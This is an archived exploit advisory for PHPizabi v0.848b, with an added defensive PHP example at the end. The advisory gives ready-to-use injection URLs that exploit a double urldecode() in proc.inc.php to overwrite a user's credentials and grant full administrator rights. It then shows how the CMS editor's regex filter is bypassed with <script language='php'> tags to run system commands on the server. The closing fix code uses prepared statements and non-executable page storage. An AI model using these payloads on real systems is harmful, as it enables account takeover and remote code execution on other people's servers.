
phpizabi-escalate.txt

Posted on 25 March 2009

--------------------------------------------------------------------------------
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
by Nine:Situations:Group::bookoo
--------------------------------------------------------------------------------
our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/
--------------------------------------------------------------------------------

vulnerability: sql injection in /theme/default/proc.inc.php

<?php
function bufferProcParse($buffer) {
    global $CONF;
    $tpl = new template;
    $tpl -> LoadThis($buffer);

    // HANDLE POSTED NOTEPAD DATA ///////////////////////////////////////////////////////
    if (isset($_GET["notepad_body"])) {
        myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
        me("flush");
    }
..

note urldecode(): PHP has already decoded $_GET once (and magic_quotes_gpc, if enabled, has already escaped it), so this second decode turns a double-encoded quote (%2527) into a bare quote after any escaping has run. That is why the issue does not depend on php.ini settings.

exploitation, manual:

injection urls:

change username and password of an existing user:

[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*

which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%2527/*

grant yourself admin rights:

[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*

which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index

boom ! now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file}

use this opening and closing tag style, example:

<script language="php">
system("ls -la");
</script>

(it is always available, see: http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php :

..
if (isset($_POST["Submit"])) {
    if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {
        $body = "<?php if (!defined(\"CORE_STRAP\")) die(); ?> "
            .preg_replace('#(<\?.*\?>)|(<%.*%>)|<\?php|<\?|\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
            ." <!-- Edited by ".me("username")." on ".date($CONF["LOCALE_HEADER_DATE_TIME"])." -->";
        fwrite($handle, $body);
        fclose($handle);
..

which is bypassed: the regex only strips the <?, <?php, ?>, <% and %> forms and never matches the <script language="php"> tag style, yet the result is still written into an executable .php file.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_

to see the output... now visit log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs
..

--------------------------------------------------------------------------------
original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html
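The two fixes a maintainer would want for the issues above, as an added example that is not PHPizabi's code: a prepared statement for the notepad update with no second urldecode(), and a CMS save that never writes user content into an executable file. The PDO handle $pdo, the resolved table name $usersTable, the current user id $currentUserId and the data directory are this example's assumptions, not the project's API.

```php
<?php
// Added example, not PHPizabi code. Assumed: $pdo (PDO), $usersTable (string),
// $currentUserId (int) and a writable, non-web-executable $dataDir.

// 1. Notepad save. The value is bound as data, so quotes cannot break the SQL,
//    and $_GET is not decoded a second time (PHP already decoded it once).
function saveNotepadBody(PDO $pdo, string $usersTable, int $currentUserId): bool
{
    if (!isset($_GET["notepad_body"]) || !is_string($_GET["notepad_body"])) {
        return false;                      // missing, or notepad_body[]=... array trick
    }
    $stmt = $pdo->prepare("UPDATE `{$usersTable}` SET `notepad_body` = :body WHERE `id` = :id");
    return $stmt->execute([
        ":body" => $_GET["notepad_body"],  // bound parameter, never part of the SQL text
        ":id"   => $currentUserId,
    ]);
}

// 2. CMS page save. Rather than blacklisting PHP open tags with a regex and
//    writing the rest into modules/cms/<id>.php, keep the content as a data
//    file the web server never executes. The id is allowlisted so it cannot
//    escape $dataDir via "../" or similar.
function cmsPath(string $dataDir, string $id): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $id)) {
        return null;
    }
    return rtrim($dataDir, '/') . "/{$id}.html.txt";
}

function saveCmsPage(string $dataDir, string $id, string $body): bool
{
    $path = cmsPath($dataDir, $id);
    return $path !== null && file_put_contents($path, $body, LOCK_EX) !== false;
}

function renderCmsPage(string $dataDir, string $id): string
{
    $path = cmsPath($dataDir, $id);
    $body = $path === null ? false : @file_get_contents($path);
    if ($body === false) {
        return '';
    }
    // The stored text is output, not included, so a saved "<script language=\"php\">"
    // is just characters. If rich HTML must survive, run it through an allowlist
    // HTML sanitizer here instead of htmlspecialchars(); the file still never executes.
    return htmlspecialchars($body, ENT_QUOTES, 'UTF-8');
}
```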

 
